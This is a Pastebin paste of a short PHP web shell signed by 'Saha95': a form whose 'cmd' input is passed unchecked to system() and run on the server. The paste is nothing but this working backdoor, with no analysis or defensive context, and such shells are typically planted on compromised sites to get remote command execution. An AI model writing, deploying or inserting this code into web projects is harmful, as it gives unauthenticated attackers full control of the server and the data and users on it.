Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- # Coded By : Saha95
- ?>
- <form method='post'>
- <input type='text' name='cmd'>
- <input type='submit' name='sa' value='run'>
- <pre>
- <!-- START CODE PHP -->
- <?
- if(!empty($_POST['sa'])) {
- system($_POST['cmd']);
- }
- ?>
- <!-- END CODE PHP -->
- <center> By Saha95 </center>
Advertisement
Add Comment
Please, Sign In to add comment